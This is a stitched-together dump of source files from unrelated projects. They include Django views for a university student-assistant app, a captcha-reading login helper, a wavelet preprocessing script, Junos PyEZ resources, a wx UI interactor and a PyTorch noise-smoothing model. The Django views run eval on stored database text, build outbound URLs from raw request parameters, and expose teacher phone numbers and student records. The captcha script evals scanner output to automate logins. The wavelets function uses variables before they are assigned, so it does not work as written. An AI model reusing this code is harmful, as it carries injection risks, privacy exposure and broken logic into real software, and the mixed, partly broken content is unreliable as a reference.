if c.gpa == "init":
nClassCount += 1
elif gpa >= float(c.gpa):
break
else:
classCount += 1
return HttpResponse(json.dumps({'gpa': str(gpa),'majorCount':majorCount,'nMajorCount':nMajorCount,'nClassCount':nClassCount,'classCount':classCount,'majorNum':majorNum,'classNum':classNum}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
def searchTeacher(request):
myconfig = Config.objects.all().first()
if request.method == "GET":
xh = request.GET.get("xh")
tname = request.GET.get("tname")
if myconfig.apichange:
res = requests.get(url=myconfig.otherapi+"/info/steacher?xh=" + request.GET.get("xh") + "&tname=" + request.GET.get("tname"))
return HttpResponse(json.dumps(json.loads(res.text), ensure_ascii=False),
content_type="application/json,charset=utf-8")
elif request.method == "POST":
xh = request.POST.get("xh")
tname = request.POST.get("tname")
if myconfig.apichange:
data = {
'xh':request.POST.get("xh"),
'tname':request.POST.get("tname")
}
res = requests.post(url=myconfig.otherapi+"/info/steacher",data=data)
return HttpResponse(json.dumps(json.loads(res.text), ensure_ascii=False),
content_type="application/json,charset=utf-8")
if xh is None or tname is None:
return HttpResponse(json.dumps({'err': '参数不全'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
else:
if not Students.objects.filter(studentId=int(xh)):
return HttpResponse(json.dumps({'err':'还未登录,请重新登录!'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
else:
date = datetime.datetime.now().strftime('%Y-%m-%d')
stu = Students.objects.filter(studentId=int(xh))
thisStu = Students.objects.get(studentId=int(xh))
lastTime = thisStu.searchTimes.split(',')[0]
remainTimes = thisStu.searchTimes.split(',')[1]
if lastTime == date:
if remainTimes != '0':
searchList = []
for s in Teachers.objects.filter(name__contains=tname).order_by('name'):
item = {
'name': s.name,
'collegeName': s.collegeName,
'title': s.title,
'phoneNumber': s.phoneNumber
}
searchList.append(item)
content = ('【%s】%s学号查询[%s]' % (datetime.datetime.now().strftime('%H:%M:%S'), xh, tname))
writeLog(content)
if len(searchList) != 0:
nremainTimes = int(remainTimes) - 1
stu.update(searchTimes=lastTime+','+str(nremainTimes))
else:
nremainTimes = int(remainTimes)
return HttpResponse(json.dumps({'count': len(searchList),'result':searchList,'times':nremainTimes}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
else:
return HttpResponse(json.dumps({'err': '同学,你今天的查询次数已满哦~'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
else:
if thisStu.classMonitor == 1:
nlastTime = date
nremainTimes = '4'
ncontent = nlastTime + ',' + nremainTimes
stu.update(searchTimes=ncontent)
searchList = []
for s in Teachers.objects.filter(name__contains=tname).order_by('name'):
item = {
'name': s.name,
'collegeName': s.collegeName,
'title': s.title,
'phoneNumber': s.phoneNumber
}
searchList.append(item)
content = ('【%s】%s学号查询[%s]' % (datetime.datetime.now().strftime('%H:%M:%S'), xh, tname))
writeLog(content)
return HttpResponse(json.dumps({'count': len(searchList),'result':searchList,'times':int(nremainTimes)}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
else:
nlastTime = date
nremainTimes = '2'
ncontent = nlastTime + ',' + nremainTimes
stu.update(searchTimes=ncontent)
searchList = []
for s in Teachers.objects.filter(name__contains=tname).order_by('name'):
item = {
'name': s.name,
'collegeName': s.collegeName,
'title': s.title,
'phoneNumber': s.phoneNumber
}
searchList.append(item)
content = ('【%s】%s学号查询[%s]' % (datetime.datetime.now().strftime('%H:%M:%S'), xh, tname))
writeLog(content)
return HttpResponse(json.dumps({'count': len(searchList),'result':searchList,'times':int(nremainTimes)}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
def searchExcept(request):
myconfig = Config.objects.all().first()
if myconfig.apichange:
data = {
'xh':request.POST.get("xh"),
'tname':request.POST.get("tname"),
'collegeName':request.POST.get("collegeName"),
'content':request.POST.get("content")
}
res = requests.post(url=myconfig.otherapi+"/info/scallback",data=data)
return HttpResponse(json.dumps(json.loads(res.text), ensure_ascii=False),
content_type="application/json,charset=utf-8")
xh = request.POST.get("xh")
tname = request.POST.get("tname")
collegeName = request.POST.get("college")
content = request.POST.get("content")
ServerChan = config["ServerChan"]
text = "黄页反馈"
if ServerChan == "none":
return HttpResponse(json.dumps({'err':'反馈失败,管理员未打开反馈接口'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
else:
requests.get(ServerChan + 'text=' + text + '&desp=' + str(xh) + '\n' + str(tname) + str(collegeName) + '\n' + str(content))
return HttpResponse(json.dumps({'msg':'反馈成功'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
def classGrades(request):
myconfig = Config.objects.all().first()
if myconfig.apichange:
res = requests.get(url=myconfig.otherapi+"/info/classgrades?className=" + request.GET.get("className") + "&yt=" + request.GET.get("yt"))
return HttpResponse(json.dumps(json.loads(res.text), ensure_ascii=False),
content_type="application/json,charset=utf-8")
className = request.GET.get("className")
yt = request.GET.get("yt")
year = yt[0:4]
term = yt[4:5]
studentIdList = []
for i in Students.objects.filter(className=className).order_by("studentId"):
studentIdList.append(i.studentId)
res = []
lastCourses = []
try:
lastStu = Students.objects.filter(className=className).order_by("-updateTime")[0].studentId
with open('data/' + str(lastStu)[0:2] + '/' + str(lastStu) + '/Grades-' + yt + '.json') as l:
lastReq = json.loads(l.read())
for course in lastReq.get("course"):
if course.get("courseNature") != "通识教育任选" and course.get("courseNature") != "无" and course.get("gradeNature") == "正常考试":
lastCourses.append(course.get("courseTitle"))
except:
lastStu = Students.objects.filter(className=className).order_by("-updateTime")[1].studentId
with open('data/' + str(lastStu)[0:2] + '/' + str(lastStu) + '/Grades-' + yt + '.json') as l:
lastReq = json.loads(l.read())
for course in lastReq.get("course"):
if course.get("courseNature") != "通识教育任选" and course.get("courseNature") != "无" and course.get("gradeNature") == "正常考试":
lastCourses.append(course.get("courseTitle"))
for stu in studentIdList:
nowUrl = 'data/' + str(stu)[0:2] + '/' + str(stu) + '/Grades-' + yt + '.json'
try:
with open(nowUrl,mode='r',encoding='UTF-8') as f:
stuReq = json.loads(f.read())
stuRes = {
'name':stuReq.get("name"),
'xh':stuReq.get("studentId"),
'grades':[{
'n':item.get("courseTitle"),
'g':item.get("grade")
}for item in stuReq["course"] if item.get("courseNature") != "通识教育任选" and item.get("courseNature") != "无" and item.get("gradeNature") == "正常考试"]
}
res.append(stuRes)
except:
res.append({'name':Students.objects.get(studentId=int(str(stu))).name,'xh':str(stu),'grades':[]})
result = {'lastCourses':lastCourses,'res':res}
writeToExcel(result,'data/classes/'+className+'.xlsx')
try:
file = open('data/classes/'+className+'.xlsx', 'rb')
except:
return HttpResponse(json.dumps({'error': "文件不存在"}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
response = FileResponse(file)
response['Content-Type'] = 'application/octet-stream'
response["Content-Disposition"] = "attachment; filename*=UTF-8''{}".format(escape_uri_path(className)+'.xlsx')
return response
def book_search(request):
type = request.GET.get("type")
content = request.GET.get("content")
page = request.GET.get("page")
result = Search()
res = result.search_book(type,content,page)
return HttpResponse(json.dumps(res, ensure_ascii=False),
content_type="application/json,charset=utf-8")
def book_detail(request):
marc = request.GET.get("marc")
result = Search()
res = result.book_detail(marc)
return HttpResponse(json.dumps(res, ensure_ascii=False),
content_type="application/json,charset=utf-8")
def library_info(request):
xh = request.POST.get("xh")
ppswd = request.POST.get("ppswd")
lgn = PLogin()
cookies = lgn.login(xh,ppswd)
person = Personal(cookies)
res = person.get_info()
return HttpResponse(json.dumps(res, ensure_ascii=False),
content_type="application/json,charset=utf-8")
def library_list(request):
xh = request.POST.get("xh")
ppswd = request.POST.get("ppswd")
lgn = PLogin()
cookies = lgn.login(xh,ppswd)
person = Personal(cookies)
res = person.book_list()
return HttpResponse(json.dumps(res, ensure_ascii=False),
content_type="application/json,charset=utf-8")
def library_hist(request):
xh = request.POST.get("xh")
ppswd = request.POST.get("ppswd")
lgn = PLogin()
cookies = lgn.login(xh,ppswd)
person = Personal(cookies)
res = person.book_hist()
return HttpResponse(json.dumps(res, ensure_ascii=False),
content_type="application/json,charset=utf-8")
def library_paylist(request):
xh = request.POST.get("xh")
ppswd = request.POST.get("ppswd")
lgn = PLogin()
cookies = lgn.login(xh,ppswd)
person = Personal(cookies)
res = person.paylist()
return HttpResponse(json.dumps(res, ensure_ascii=False),
content_type="application/json,charset=utf-8")
def library_paydetail(request):
xh = request.POST.get("xh")
ppswd = request.POST.get("ppswd")
lgn = PLogin()
cookies = lgn.login(xh,ppswd)
person = Personal(cookies)
res = person.paydetail()
return HttpResponse(json.dumps(res, ensure_ascii=False),
content_type="application/json,charset=utf-8")
def school_card(request):
xh = request.POST.get("xh")
ppswd = request.POST.get("ppswd")
page = request.POST.get("page")
lgn = PLogin()
cookies = lgn.plogin(xh,ppswd)
person = Infos(cookies)
res = person.school_card(page)
return HttpResponse(json.dumps(res, ensure_ascii=False),
content_type="application/json,charset=utf-8")
def financial(request):
xh = request.POST.get("xh")
ppswd = request.POST.get("ppswd")
page = request.POST.get("page")
lgn = PLogin()
cookies = lgn.plogin(xh,ppswd)
person = Infos(cookies)
res = person.financial(page)
return HttpResponse(json.dumps(res, ensure_ascii=False),
content_type="application/json,charset=utf-8")
def award(request):
if request.method == "POST":
keyword = request.POST.get("keyword")
else:
keyword = request.GET.get("keyword")
url = "http://xcctw.cn/app/index.php?keyword=" + keyword + "&i=2&c=entry&a=site&do=fm&m=yoby_cha&rid=13"
res = requests.get(url=url)
soup = BeautifulSoup(res.text,'lxml')
if soup.find(class_="weui-msgbox"):
return HttpResponse(json.dumps({'err':"没有查询到结果"}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
list = soup.find_all(class_="weui-cell__bd")
result = []
for items in list:
name = (items.find_all(class_="f16")[0].get_text()[3:]).strip()
studentId = (items.find_all(class_="f16")[1].get_text()[3:]).strip()
college = (items.find_all(class_="f16")[2].get_text()[5:]).strip()
major = (items.find_all(class_="f16")[3].get_text()[3:]).strip()
detail = (items.find_all(class_="f16")[4].get_text()[5:]).strip()
number = (items.find_all(class_="f16")[5].get_text()[5:]).strip()
items = {'name':name,'studentId':studentId,'college':college,'major':major,'detail':detail,'number':number}
result.append(items)
return HttpResponse(json.dumps(result, ensure_ascii=False),
content_type="application/json,charset=utf-8")
def get_maps(request):
if request.method == "GET":
xh = request.GET.get("xh")
elif request.method == "POST":
xh = request.POST.get("xh")
allIn = Students.objects.all().count()
thisStu = Students.objects.get(studentId=int(xh))
thisStuBirthDayAndMonth = (thisStu.birthDay)[5:]
names = Students.objects.filter(name=thisStu.name).count() - 1
birthDay = Students.objects.filter(birthDay=thisStu.birthDay).count() - 1
birthDayAndMonth = Students.objects.filter(birthDay__contains=thisStuBirthDayAndMonth).count() - 1
classBirthDay = Students.objects.filter(className=thisStu.className,birthDay=thisStu.birthDay).count() - 1
classBirthDayAndMonth = Students.objects.filter(className=thisStu.className,birthDay__contains=thisStuBirthDayAndMonth).count() - 1
graduationSchool = Students.objects.filter(graduationSchool=thisStu.graduationSchool).count() - 1
classGraduationSchool = Students.objects.filter(className=thisStu.className,graduationSchool=thisStu.graduationSchool).count() - 1
domicile = Students.objects.filter(domicile=thisStu.domicile).count() - 1
classDomicile = Students.objects.filter(className=thisStu.className,domicile=thisStu.domicile).count() - 1
res = {
'allIn': allIn,
'name': names,
'birthDay': birthDay,
'birthDayAndMonth': birthDayAndMonth,
'classBirthDay': classBirthDay,
'classBirthDayAndMonth': classBirthDayAndMonth,
'graduationSchool': graduationSchool,
'classGraduationSchool': classGraduationSchool,
'domicile': domicile,
'places':thisStu.domicile,
'classDomicile': classDomicile
}
return HttpResponse(json.dumps(res, ensure_ascii=False),
content_type="application/json,charset=utf-8")
def isMonitor(request):
xh = request.GET.get("xh")
if Students.objects.filter(studentId=int(xh)):
thisStu = Students.objects.get(studentId=int(xh))
res = {"code":200,"monitor":True if thisStu.classMonitor == 1 else False}
return HttpResponse(json.dumps(res, ensure_ascii=False),
content_type="application/json,charset=utf-8")
else:
return HttpResponse(json.dumps({"err":"没有这个同学"}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
def freetime(request):
myconfig = Config.objects.all().first()
xh = request.GET.get("xh")
term = request.GET.get("term") if request.GET.get("term") is not None else myconfig.nSchedule
weeks = request.GET.get("weeks") if request.GET.get("weeks") is not None else myconfig.nowweek
mode = request.GET.get("mode") if request.GET.get("mode") is not None else "1"
datafile = 'data/' + xh[0:2] + "/" + xh + "/" + "Schedules-" + term + ".json"
fullSections = [1,2,3,4,5,6,7,8,9,10,11,12]
if os.path.exists(datafile):
with open(datafile,mode='r',encoding='UTF-8') as f:
schedule_data = json.loads(f.read())
res = {"Mon":[],"Tue":[],"Wed":[],"Thu":[],"Fri":[]}
for item in schedule_data["normalCourse"]:
if item["courseWeekday"] == "1" and int(weeks) in item["includeWeeks"]:
res["Mon"].extend(item["includeSection"])
elif item["courseWeekday"] == "2" and int(weeks) in item["includeWeeks"]:
res["Tue"].extend(item["includeSection"])
elif item["courseWeekday"] == "3" and int(weeks) in item["includeWeeks"]:
res["Wed"].extend(item["includeSection"])
elif item["courseWeekday"] == "4" and int(weeks) in item["includeWeeks"]:
res["Thu"].extend(item["includeSection"])
elif item["courseWeekday"] == "5" and int(weeks) in item["includeWeeks"]:
res["Fri"].extend(item["includeSection"])
else:
pass
if mode == "1":
res["Mon"] = diffList(fullSections,res["Mon"])
res["Tue"] = diffList(fullSections,res["Tue"])
res["Wed"] = diffList(fullSections,res["Wed"])
res["Thu"] = diffList(fullSections,res["Thu"])
res["Fri"] = diffList(fullSections,res["Fri"])
return HttpResponse(json.dumps(res, ensure_ascii=False),
content_type="application/json,charset=utf-8")
else:
return HttpResponse(json.dumps({"err":"原因:1.该同学没有使用“西院助手”小程序。2.没有在小程序请求过该学期课程信息。3.还未到该学期"}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
```
#### File: zfnweb/mp/__init__.py
```python
from django.apps import AppConfig
import os
default_app_config = 'mp.MpConfig'
# 获取apps所在文件夹名字,如果文件夹名字修改,这里可以动态调整
def get_current_app_name(_file):
return os.path.split(os.path.dirname(_file))[-1]
class MpConfig(AppConfig):
# 这里apps所在文件夹名字直接固定,如果更改则也需要调整
# name = 'df_goods'
name = get_current_app_name(__file__) # 这里的结果是:df_goods
verbose_name = '小程序'
```
#### File: zfnweb/mp/views.py
```python
from django.shortcuts import render,HttpResponse
from mp.models import Notices,Config,Navigate,About,Countdown
import json
import time,datetime
from pytz import timezone
import requests
cst_tz = timezone('Asia/Shanghai')
def index(request):
return HttpResponse('mp_index here')
def importantNotice():
if Notices.objects.filter(important=True):
important = Notices.objects.get(important=True)
res = {
'title':important.title,
'detail':important.detail,
'key':important.key
}
return res
else:
return 'none'
def autoCalWeeks(date1):
myconfig = Config.objects.all().first()
date1=time.strptime(date1,"%Y-%m-%d")
date2 = datetime.datetime.now().timetuple()
date1=datetime.datetime(date1[0],date1[1],date1[2])
date2=datetime.datetime(date2[0],date2[1],date2[2])
differ=date2-date1
weekth=differ//datetime.timedelta(days=7)+1
myconfig.nowweek = weekth
myconfig.save()
return weekth
def mconfig(request):
myconfig = Config.objects.all().first()
if myconfig.apichange:
res = requests.get(url=myconfig.otherapi+"/mp/conf")
return HttpResponse(json.dumps(json.loads(res.text), ensure_ascii=False),
content_type="application/json,charset=utf-8")
res = {
'version': myconfig.version,
'nChoose': myconfig.nChoose,
'nGrade': myconfig.nGrade,
'nSchedule': myconfig.nSchedule,
'vacation': myconfig.vacation,
'nowweek': autoCalWeeks((myconfig.startDate).strftime('%Y-%m-%d')) if myconfig.autoCalWeeks else myconfig.nowweek,
'choose': myconfig.choose,
'notice': [{
'title':i.title,
'ltitle':i.ltitle,
'image':i.image,
'detail':eval(repr(i.detail).replace('\\\\', '\\')),
'show':i.show,
'date':(i.date).astimezone(cst_tz).strftime("%Y-%m-%d %H:%M")
}for i in Notices.objects.filter(important=False,show=True).all().order_by('-date')],
'important':importantNotice()
}
return HttpResponse(json.dumps(res, ensure_ascii=False),
content_type="application/json,charset=utf-8")
def countTime(date):
if date != "none":
nowdate = datetime.datetime.now()
rdate = datetime.datetime.strptime(date, '%Y-%m-%d')
days = (rdate - nowdate).days + 1
return ("%d天" % days)
else:
return "暂定"
def countdown(request):
myconfig = Config.objects.all().first()
if myconfig.apichange:
res = requests.get(url=myconfig.otherapi+"/mp/countdown")
return HttpResponse(json.dumps(json.loads(res.text), ensure_ascii=False),
content_type="application/json,charset=utf-8")
res = [{
'name': i.name,
'shortname': eval(repr(i.shortname).replace('\\\\', '\\')),
'date': countTime(i.date)
}for i in Countdown.objects.all()]
return HttpResponse(json.dumps(res, ensure_ascii=False),
content_type="application/json,charset=utf-8")
def navigate(request):
myconfig = Config.objects.all().first()
if myconfig.apichange:
res = requests.get(url=myconfig.otherapi+"/mp/navigate?type=" + request.GET.get("type"))
return HttpResponse(json.dumps(json.loads(res.text), ensure_ascii=False),
content_type="application/json,charset=utf-8")
type = request.GET.get("type")
if type == 'school':
school_res = [{
'title':i.title,
'ltitle':i.ltitle,
'content':eval(repr(i.content).replace('\\\\', '\\')),
'image':i.image if i.image != 'none' else False
}for i in Navigate.objects.filter(type="school").all().order_by('title')]
return HttpResponse(json.dumps(school_res, ensure_ascii=False),
content_type="application/json,charset=utf-8")
elif type == 'bar':
bar_res = [{
'title':j.title,
'ltitle':j.ltitle,
'content':eval(repr(j.content).replace('\\\\', '\\')),
'image':j.image if j.image != 'none' else False
}for j in Navigate.objects.filter(type="bar").all().order_by('title')]
return HttpResponse(json.dumps(bar_res, ensure_ascii=False),
content_type="application/json,charset=utf-8")
else:
return HttpResponse(json.dumps({'err':"缺少参数type"}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
def about(request):
myconfig = Config.objects.all().first()
if myconfig.apichange:
res = requests.get(url=myconfig.otherapi+"/mp/about")
return HttpResponse(json.dumps(json.loads(res.text), ensure_ascii=False),
content_type="application/json,charset=utf-8")
about = {
"qa":[{
"question": i.title,
"answer": eval(repr(i.content).replace('\\\\', '\\'))
}for i in About.objects.filter(type=1).all().order_by('dates')],
"license":[{
"title": j.title,
"content": eval(repr(j.content).replace('\\\\', '\\'))
}for j in About.objects.filter(type=2).all().order_by('dates')],
"money":[ k.title + "-" + k.content + ":"+ (k.dates).astimezone(cst_tz).strftime("%Y-%m-%d") for k in About.objects.filter(type=3).all().order_by('dates')],
"aboutus":{
"title": About.objects.filter(type=4).first().title,
"content": eval(repr(About.objects.filter(type=4).first().content).replace('\\\\', '\\'))
},
"contact":{
"wechat":"RiotJS",
"email":"<EMAIL>",
"qq": "709662329"
}
}
return HttpResponse(json.dumps(about, ensure_ascii=False),
content_type="application/json,charset=utf-8")
def outimg(request):
type = request.POST.get("type")
data = request.POST.get("data")
res = {
'msg':'暂不支持导出',
'url':"http://e.hiphotos.baidu.com/zhidao/pic/item/b64543a98226cffc7a951157b8014a90f703ea9c.jpg"
}
return HttpResponse(json.dumps(res, ensure_ascii=False),
content_type="application/json,charset=utf-8")
```
#### File: zfnweb/one/views.py
```python
from django.shortcuts import render
from django.http import HttpResponse, JsonResponse
import os
import json
from bs4 import BeautifulSoup
import requests
import re
import datetime
from mp.models import Config
def get_one(request):
myconfig = Config.objects.all().first()
if myconfig.apichange:
res = requests.get(url=myconfig.otherapi+"/one")
return HttpResponse(json.dumps(json.loads(res.text), ensure_ascii=False),
content_type="application/json,charset=utf-8")
with open('one.txt', mode='r', encoding='utf-8') as f:
if os.path.exists('one.txt'):
lines = f.readlines()
last_line = lines[-1]
# print(last_line)
if datetime.datetime.now().strftime('%Y-%m-%d') in last_line:
# print('读取模式')
content = last_line[12:]
return HttpResponse(json.dumps({'msg':'success','content':content}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
elif int(datetime.datetime.now().strftime('%H')) < 8:
content = last_line[12:]
return HttpResponse(json.dumps({'msg':'success','content':content}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
else:
with open('one.txt', mode='a', encoding='utf-8') as n:
# print('第一个访问了one!')
url = "http://wufazhuce.com/"
r = requests.get(url)
r.encoding = r.apparent_encoding
soup = BeautifulSoup(r.text, 'html.parser')
oneall = soup.find('div', class_=re.compile('fp-one-cita'))
one = oneall.a.string
if int(datetime.datetime.now().strftime('%H')) > 8: # 每天九点后one肯定更新了
n.write('\n【%s】%s' % (datetime.datetime.now().strftime('%Y-%m-%d'), one))
return HttpResponse(json.dumps({'msg':'success','content':one}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
else:
return HttpResponse(json.dumps({'msg':'error','content':"提醒管理员配置每日一言"}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
``` |
{
"source": "Jokerwin/clusteris",
"score": 3
} |
#### File: clusteris/config/interactor.py
```python
import wx
class Interactor(object):
"""Connects the UI events with the Presenter class."""
def Connect(self, presenter, view):
"""Listens to UI evens and asigns an event handler on the Presenter."""
self.presenter = presenter
self.view = view
view.choiceAlgorithm.Bind(wx.EVT_CHOICE, self.OnAlgorithmSelected)
view.spinCentroidsParam.Bind(wx.EVT_SPINCTRL, self.OnCentroidSpinCtrl)
view.radioBtn2D.Bind(wx.EVT_RADIOBUTTON, self.OnRadioButton2DClicked)
view.radioBtn3D.Bind(wx.EVT_RADIOBUTTON, self.OnRadioButton3DClicked)
view.choiceXAxe.Bind(wx.EVT_CHOICE, self.OnXAxeSelected)
view.choiceYAxe.Bind(wx.EVT_CHOICE, self.OnYAxeSelected)
view.choiceZAxe.Bind(wx.EVT_CHOICE, self.OnZAxeSelected)
view.spinPopulationParam.Bind(wx.EVT_SPINCTRL, self.OnPopulationSpinCtrl)
view.spinIterationParam.Bind(wx.EVT_SPINCTRL, self.OnIterationsSpinCtrl)
view.radioFixedClassParam.Bind(wx.EVT_RADIOBUTTON, self.OnRadioFixedClassParamClicked)
view.radioVarClassParam.Bind(wx.EVT_RADIOBUTTON, self.OnRadioVarClassParamClicked)
view.buttonCancel.Bind(wx.EVT_BUTTON, self.OnCancelClicked)
view.buttonProcess.Bind(wx.EVT_BUTTON, self.OnProcessClicked)
view.Bind(wx.EVT_CLOSE, self.OnCancelClicked)
def OnAlgorithmSelected(self, evt):
self.presenter.SetAlgorithm(evt.GetSelection(), evt.GetString())
def OnCentroidSpinCtrl(self, evt):
self.presenter.SetCentroidParam(evt.GetPosition())
def OnRadioButton2DClicked(self, evt):
self.presenter.Radio2DClicked(evt.IsChecked())
def OnRadioButton3DClicked(self, evt):
self.presenter.Radio3DClicked(evt.IsChecked())
def OnXAxeSelected(self, evt):
self.presenter.SetSelectedAxe(0, evt.GetSelection())
def OnYAxeSelected(self, evt):
self.presenter.SetSelectedAxe(1, evt.GetSelection())
def OnZAxeSelected(self, evt):
self.presenter.SetSelectedAxe(2, evt.GetSelection())
def OnPopulationSpinCtrl(self, evt):
self.presenter.SetPopulationParam(evt.GetPosition())
def OnIterationsSpinCtrl(self, evt):
self.presenter.SetIterationParam(evt.GetPosition())
def OnRadioFixedClassParamClicked(self, evt):
self.presenter.RadioFixedClassParamClicked(evt.IsChecked())
def OnRadioVarClassParamClicked(self, evt):
self.presenter.RadioVarClassParamClicked(evt.IsChecked())
def OnProcessClicked(self, evt):
self.presenter.Process()
def OnCancelClicked(self, evt):
self.presenter.Cancel()
``` |
{
"source": "joker-xii/login-zhjw",
"score": 3
} |
#### File: joker-xii/login-zhjw/readimg.py
```python
import scan
import os
import string
import sys
tmps = scan.get_templates()
def read_img(name):
# url='https://zhjw.neu.edu.cn/ACTIONVALIDATERANDOMPICTURE.APPPROCESS?id='+urlappend
res = scan.scan_code(name, tmps)
os.remove(name)
return eval(res)
if(len(sys.argv) == 2):
print(read_img(sys.argv[1]))
else:
print(read_img(""))
sys.stdout.flush()
``` |
{
"source": "joker-xii/plant-potential",
"score": 3
} |
#### File: plant-potential/lzc/wavelets.py
```python
import pywt
import pandas as pd
import math
import numpy as np
import matplotlib.pyplot as plt
from lzc.config import *
def read_data(raw, length=SPLIT_SIZE, max_len=MAX_LENGTH):
raw_data = pd.read_csv(raw).iloc[:, 0].values
raw_data = raw_data[:max_len]
sure_value = math.floor(len(raw_data) / length) * length
# print("sure of", sure_value, len(raw_data))
# crop data
raw_data = raw_data[:sure_value]
# split data to length
dds = np.array_split(raw_data, (len(raw_data) / length))
return dds, raw_data
def plot(y,title =""):
plt.title(title)
x = np.linspace(0, len(y) - 1, len(y))
plt.plot(x, y)
plt.show()
def get_transformed(data, func):
retCA = []
retCD = []
for i in data:
# print(len(i), "Fuck!")
cA = np.pad(cA, (0, len(i) - len(cA)), mode='constant')
cD = np.pad(cD, (0, len(i) - len(cD)), mode='constant')
retCA = retCA + cA.tolist()
retCD = retCD + cD.tolist()
return retCA, retCD
def plot_each(data, func):
(cA, cD) = pywt.dwt(data[0], func)
plot(cA,'cA of DWTUnit('+func+")")
plot(cD,'cD of DWTUnit('+func+")")
def to_wavs(fname, max_len=MAX_LENGTH, attr='csv'):
datas, rd = read_data(fname + "." + attr, max_len=max_len)
df = pd.DataFrame()
df["basic"] = rd
for i in WAVELETS:
print(i)
ca, cd = get_transformed(datas, i)
df[i + "_cA"] = ca
df[i + "_cD"] = cd
df.to_csv(fname + "_dwt300.csv", float_format='%.3f')
def show_wav(fname, max_len = MAX_LENGTH, attr='csv'):
datas, rd = read_data(fname + "." + attr, max_len=max_len)
plot(datas[0],'input')
for i in WAVELETS:
plot_each(datas,i)
if __name__ == '__main__':
# to_wavs("olddata/m0", max_len=OLD_DATA_LEN, attr='txt')
# to_wavs("olddata/m1", max_len=OLD_DATA_LEN, attr='txt')
# to_wavs("olddata/m2", max_len=OLD_DATA_LEN, attr='txt')
# to_wavs('0m')
# to_wavs('1m')
# to_wavs('2m')
# print(len(pywt.wavelist(kind='discrete')))
# for i in pywt.wavelist(kind='discrete'):
# print(i)
show_wav('1m')
``` |
{
"source": "jokerxs/pyez_resources",
"score": 2
} |
#### File: jokerxs/pyez_resources/prefix_list_item.py
```python
from lxml.builder import E
# local module
from jnpr.junos.cfg import Resource
from jnpr.junos import jxml as JXML
class PrefixListItem(Resource):
"""
[edit policy-options prefix-list <name> prefix-list-item <item> ]
Resource name: str
<name> is the prefix-list name
"""
# there are no properties, since the name is the actual data
PROPERTIES = []
# -----------------------------------------------------------------------
# XML readers
# -----------------------------------------------------------------------
def _xml_at_top(self):
return E('policy-options', E('prefix-list',
E.name(self.P.name),
E('prefix-list-item', E.name(self._name))
))
def _xml_at_res(self, xml):
return xml.find('.//prefix-list-item')
def _xml_to_py(self, has_xml, has_py):
Resource._r_has_xml_status(has_xml, has_py)
# -----------------------------------------------------------------------
# Manager List, Catalog
# -----------------------------------------------------------------------
def _r_list(self):
# the key list comes from the parent object.
self._rlist = self.P['$prefix_list_items']
def _r_catalog(self):
# no catalog but the keys
self._rcatalog = dict((k, None) for k in self.list)
```
#### File: jokerxs/pyez_resources/prefix_list.py
```python
from lxml.builder import E
# module packages
from jnpr.junos.cfg import Resource
from jnpr.junos import jxml as JXML
from jnpr.junos.cfg.prefix_list_item import PrefixListItem
class PrefixList(Resource):
"""
[edit policy-otions prefix-list <name>]
Resource name: str
<name> is the prefix-list name
Manages resources:
prefix_list_item, PrefixListItem
"""
PROPERTIES = [
'$prefix_list_items' # read only names of prefix-list-items
]
MANAGES = { 'prefix_list_item': PrefixListItem }
# -----------------------------------------------------------------------
# XML readers
# -----------------------------------------------------------------------
def _xml_at_top(self):
return E('policy-options', E('prefix-list', E.name(self._name)))
def _xml_at_res(self, xml):
return xml.find('.//prefix-list')
def _xml_to_py(self, has_xml, has_py):
Resource._r_has_xml_status(has_xml, has_py)
# prefix-list-item
has_py['$prefix_list_items'] = [ item.text
for item in has_xml.xpath('.//prefix-list-item/name') ]
# -----------------------------------------------------------------------
# Manager List, Catalog
# -----------------------------------------------------------------------
def _r_list(self):
get = E('policy-options', E('prefix-list', JXML.NAMES_ONLY))
got = self.R.get_config(get)
self._rlist = [ name.text
for name in got.xpath('.//prefix-list/name') ]
``` |
{
"source": "JokerYan/pytorch_image_classification",
"score": 2
} |
#### File: pytorch_image_classification/custom_models/smooth_model.py
```python
import torch
import torch.nn as nn
from utils.debug_tools import save_image_stack, clear_debug_image
class SmoothModel(nn.Module):
def __init__(self, base_model, mean=0, std=0.5, sample_size=20):
super(SmoothModel, self).__init__()
self.base_model = base_model
self.mean = mean
self.std = std
self.sample_size = sample_size
self.adv_filter = None
def forward(self, x):
# input_clone = x.clone().detach()
# input_clone.requires_grad = True
# base_output = self.base_model(input_clone)
# torch.max(base_output).backward()
# grad_data = input_clone.grad.data
# grad_data = torch.abs(grad_data)
# grad_data -= grad_data.min(1, keepdim=True).values
# grad_data /= grad_data.max(1, keepdim=True).values
input_dummy = torch.ones(x.shape)
output_list = []
output_c_list = []
for i in range(self.sample_size):
gaussian_noise = torch.normal(self.mean * input_dummy, self.std * input_dummy).cuda()
# gaussian_noise = input_dummy.cuda()
# linear_noise = torch.randn_like(x).cuda() * 0.1 + 0.9
# gaussian_noise = gaussian_noise * grad_data
gaussian_noise = gaussian_noise * self.get_focus_filter(x.shape)
# if self.adv_filter is not None:
# gaussian_noise = gaussian_noise * self.adv_filter
save_image_stack(torch.mean(torch.abs(gaussian_noise), dim=1, keepdim=True), "gaussian_noise_{}".format(i))
gaussian_input = x + gaussian_noise
# gaussian_input = x * (1 + gaussian_noise)
# gaussian_input = x * gaussian_noise
save_image_stack(gaussian_input, "gaussian_input_{}".format(i), normalized=True)
# gaussian_input = x * linear_noise
gaussian_output = self.base_model(gaussian_input)
# min max norm to 0 ~ 1
gaussian_output -= gaussian_output.min(1, keepdim=True).values
gaussian_output /= gaussian_output.max(1, keepdim=True).values
output_list.append(gaussian_output)
output_c_list.append(int(torch.max(gaussian_output, dim=1).indices))
print(output_c_list)
return torch.mean(torch.stack(output_list), dim=0)
